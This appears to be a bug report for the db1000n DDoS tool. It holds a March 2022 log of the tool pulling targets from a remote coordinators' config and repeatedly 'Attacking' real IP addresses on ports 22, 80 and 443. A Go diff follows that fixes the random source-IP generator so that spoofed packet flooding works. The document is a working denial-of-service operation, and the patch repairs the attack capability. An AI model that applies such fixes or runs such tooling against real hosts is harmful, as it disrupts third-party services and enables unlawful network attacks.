sendmsg: invalid argument  - latest version

2022/03/09 07:16:27.979233 config.go:33: Loading config from "https://raw.githubusercontent.com/db1000n-coordina
tors/LoadTestConfig/main/config.json"
2022/03/09 07:16:27.979263 config.go:91: New config received, applying
2022/03/09 07:16:27.979875 runner.go:118: 74 job instances (re)started
2022/03/09 07:16:27.980493 packetgen.go:46: Attacking 5.188.198.134:22
2022/03/09 07:16:27.987567 http.go:88: Attacking [https://37.18.111.225:443](https://37.18.111.225/)
2022/03/09 07:16:27.987971 http.go:88: Attacking [http://194.54.14.168:80](http://194.54.14.168/)
2022/03/09 07:16:27.988241 http.go:88: Attacking [http://194.54.14.168:80](http://194.54.14.168/)
2022/03/09 07:16:27.988476 http.go:88: Attacking http://194.54.14.168:80
2022/03/09 07:16:27.988709 http.go:88: Attacking http://194.54.14.168:80
2022/03/09 07:16:27.988949 http.go:88: Attacking http://194.54.14.168:80
2022/03/09 07:16:27.989190 http.go:88: Attacking http://194.54.14.168:80
2022/03/09 07:16:27.989469 http.go:88: Attacking http://194.54.14.168:80
2022/03/09 07:16:27.989784 http.go:88: Attacking http://194.54.14.168:80
2022/03/09 07:16:27.990105 http.go:88: Attacking http://194.54.14.168:80
2022/03/09 07:16:27.990416 http.go:88: Attacking http://194.54.14.168:80
2022/03/09 07:16:27.990715 http.go:88: Attacking https://194.54.14.168:443
2022/03/09 07:16:27.991020 http.go:88: Attacking https://194.54.14.168:443
2022/03/09 07:16:27.991331 http.go:88: Attacking https://194.54.14.168:443
2022/03/09 07:16:27.991652 http.go:88: Attacking https://194.54.14.168:443
2022/03/09 07:16:27.991952 http.go:88: Attacking https://194.54.14.168:443
2022/03/09 07:16:27.993032 http.go:88: Attacking https://194.54.14.168:443
2022/03/09 07:16:27.993123 http.go:88: Attacking https://37.18.111.225:443
2022/03/09 07:16:27.993802 http.go:88: Attacking https://194.54.14.168:443
2022/03/09 07:16:27.993918 http.go:88: Attacking https://37.18.111.225:443
2022/03/09 07:16:27.994621 http.go:88: Attacking https://37.18.111.225:443
2022/03/09 07:16:27.995083 http.go:88: Attacking https://194.54.14.168:443
2022/03/09 07:16:27.995534 http.go:88: Attacking https://37.18.111.225:443
2022/03/09 07:16:27.995577 http.go:88: Attacking https://194.54.14.168:443
2022/03/09 07:16:27.996042 http.go:88: Attacking https://37.18.111.225:443
2022/03/09 07:16:27.996450 http.go:88: Attacking https://37.18.111.225:443
2022/03/09 07:16:27.999637 http.go:88: Attacking https://37.18.111.225:443
2022/03/09 07:16:28.000406 http.go:88: Attacking http://5.188.189.254:80
2022/03/09 07:16:28.000781 http.go:88: Attacking http://5.188.189.254:80
2022/03/09 07:16:28.001057 http.go:88: Attacking http://5.188.189.254:80
2022/03/09 07:16:28.001197 http.go:88: Attacking https://37.18.111.226:443
2022/03/09 07:16:28.001361 http.go:88: Attacking http://5.188.189.254:80
2022/03/09 07:16:28.001656 http.go:88: Attacking http://5.188.189.254:80
2022/03/09 07:16:28.001967 http.go:88: Attacking http://5.188.189.254:80
2022/03/09 07:16:28.081295 packetgen.go:65: Error sending packet: write ip 0.0.0.0->0.83.40.199: sendmsg: invali
d argument
2022/03/09 07:16:28.206101 countrychecker.go:55: Current country: United States
2022/03/09 07:16:28.290854 packetgen.go:65: Error sending packet: write ip 0.0.0.0->0.140.56.69: sendmsg: invali
d argument
2022/03/09 07:16:28.298787 packetgen.go:65: Error sending packet: write ip 0.0.0.0->0.114.222.59: sendmsg: inval
id argument
2022/03/09 07:16:28.303825 packetgen.go:65: Error sending packet: write ip 0.0.0.0->0.199.105.135: sendmsg: inva
lid argument

--- a/src/packetgen/utils.go
+++ b/src/packetgen/utils.go
@@ -39,8 +39,8 @@ func RandomPayload(length int) []byte {
 }
 
 func RandomIP() string {
-	return fmt.Sprintf("%d.%d.%d.%d", rand.Intn(256), rand.Intn(256),
-		rand.Intn(256), rand.Intn(256))
+	return fmt.Sprintf("%d.%d.%d.%d", rand.Intn(255)+1, rand.Intn(255)+1,
+		rand.Intn(255)+1, rand.Intn(255)+1)
 }
 
 func RandomPort() int {

